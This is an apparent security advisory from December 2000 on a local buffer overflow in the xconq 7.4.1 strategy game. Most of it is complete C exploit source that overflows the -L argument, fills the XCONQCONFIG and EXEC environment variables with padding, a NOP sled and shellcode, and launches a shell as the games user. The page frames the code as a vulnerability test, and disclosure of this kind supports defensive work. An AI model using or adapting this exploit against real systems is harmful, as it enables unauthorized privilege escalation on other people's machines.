Exploit code for xconq has been released (XCONQCONFIG)
27 Dec. 2000
Summary
Xconq is a general strategy game system. It is a complete system that includes all the components: a portable engine, graphical interfaces for Unix/Linux/X11, Macintosh, and Windows, multiple AIs, networking for multi-player games, and an extensive game library. A security vulnerability in the product can be exploited to gain elevated privileges.
Exploit:
The exploit code below can be used to test for this vulnerability.
/* (linux)xconq[v7.4.1] local buffer overflow, by: v9[v9@fakehalo.org]. this
will give you uid=games on systems with xconq. this exploit was slightly
more work than i thought it was going to be. i originally wrote this
exploit for the -g parameter. but, via the -g parameter you must have a
display. via ths -L parameter you do not need a display, but it is much
more exact. in this method you have to fill the XCONQCONFIG environmental
variable to a certain point to be able to overwrite the eip via the -L
parameter. (64 bytes is more than enough). i also needed to modify some
shellcode for this. all in all, too much work for what it is worth.
Xconq is free software and you are welcome to distribute copies of it
under certain conditions; type "o copying" to see the conditions.
There is absolutely no warranty for Xconq; type "o warranty" for details.
fakehalo: uid:20 gid:100. [euid:20 egid:100]
bash#
------------------------------------------------------------------------------
note: built and tested on slackware. some other overflowable functions i
will mention are the -g parameter and the XCONQLIB environmental
variable, both of those overflows require a display to exploit.
this program also has an odd usage of setuid(); in it to drop its
privileges -- making it possible to break. and yes, i squished the
code together on purpose. why? i am a *x80 resolution kinda guy :/.
*/
#define PATH "/usr/local/bin/xconq" // path to xconq7.4.1.
#define DEFAULT_ALIGN 0 // generic alignment.
#define DEFAULT_OFFSET -5000 // generic offset. (from bufsize)
#define DEFAULT_UID 20 // user id of games.
#define DEFAULT_CAP 507 // exact buffer cut off point.
#define FILLER 0x78 // filling character, for misc use.
static char exec[]= // setreuid()+exec(): v9@fakehalo.org.
"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x00\x31\xc0\xb0\x46\xcd\x80\x31\xdb"
"\x31\xc9\xb3\x00\xb1\x00\x31\xc0\xb0\x46\xcd\x80\xeb\x24\x5e\x8d\x1e\x89\x5e"
"\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x01";
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char bofeip[512],env[4096],push[64];int i,offset,align,uid,cap;long ret;
printf("[ (linux)xconq[v7.4.1] local buffer overflow, by: v9[v9@fakehalo.org]"
". ]\n");
if((argv[1]&&!strcmp(argv[1],"-h"))||(argv[1]&&!strcmp(argv[1],"--help"))){
printf("*** [syntax]: %s [offset] [alignment] [user id] [capoff buffer value"
"].\n",argv[0]);
printf("*** [required]: argument alignment value must be: 0-3.\n");
printf("*** [required]: argument user id value must be: 1-255.\n");
printf("*** [required]: argument cap value must be: 1-%d.\n",sizeof(bofeip));
exit(0);
}
if(argc>1){offset=atoi(argv[1]);}else{offset=DEFAULT_OFFSET;}
if(argc>2){
if(atoi(argv[2])>3||atoi(argv[2])<0){
printf("*** [error]: ignored argument alignment value: %s. (use 0-3)\n",
argv[2]);align=DEFAULT_ALIGN;
}
else{align=atoi(argv[2]);}
}
else{align=DEFAULT_ALIGN;}
if(argc>3){
if(atoi(argv[3])<1||atoi(argv[3])>255){
printf("*** [error]: ignored argument uid value: %s. (use 1-255)\n",
argv[3]);uid=DEFAULT_UID;
}
else{uid=atoi(argv[3]);}
}
else{uid=DEFAULT_UID;}
if(argc>4){
if(atoi(argv[4])<1||atoi(argv[4])>sizeof(bofeip)){
printf("*** [error]: ignored argument cap value: %s. (use 1-%d)\n",argv[4],
sizeof(bofeip));cap=DEFAULT_CAP;
}
else{cap=atoi(argv[4]);}
}
else{cap=DEFAULT_CAP;}
ret=(esp()-offset);for(i=0;i<align;i++){bofeip[i]=FILLER;}
for(i=align;i<(sizeof(bofeip)-4);i+=4){*(long *)&bofeip[i]=ret;}
bofeip[cap]=0x0;
for(i=0;i<(sizeof(env)-strlen(exec)-strlen(bofeip));i++){env[i]=0x90;}
exec[10]=uid;exec[22]=uid;exec[24]=uid;memcpy(env+i,exec,strlen(exec));
env[(i+strlen(exec))]=0x0;printf("*** [data]: addr: 0x%lx, offset: %d, alignm"
"ent: %d, uid: %d, cap: %d.\n*** [data]: sizeof(bofeip): %d, sizeof(env): %d,"
" sizeof(push): %d, nop=%d.\n",ret,offset,align,uid,cap,sizeof(bofeip),
sizeof(env),sizeof(push),(strlen(env)-strlen((char *)strrchr(env,0x90))+1));
setenv("EXEC",env,1);memset(push,FILLER,sizeof(push));
push[sizeof(push)]=0x0;setenv("XCONQCONFIG",push,1);
if(execl(PATH,PATH,"-L",bofeip,0)){
printf("*** [error]: could not execute %s properly.\n",argv[0]);
exit(-1);
}
}
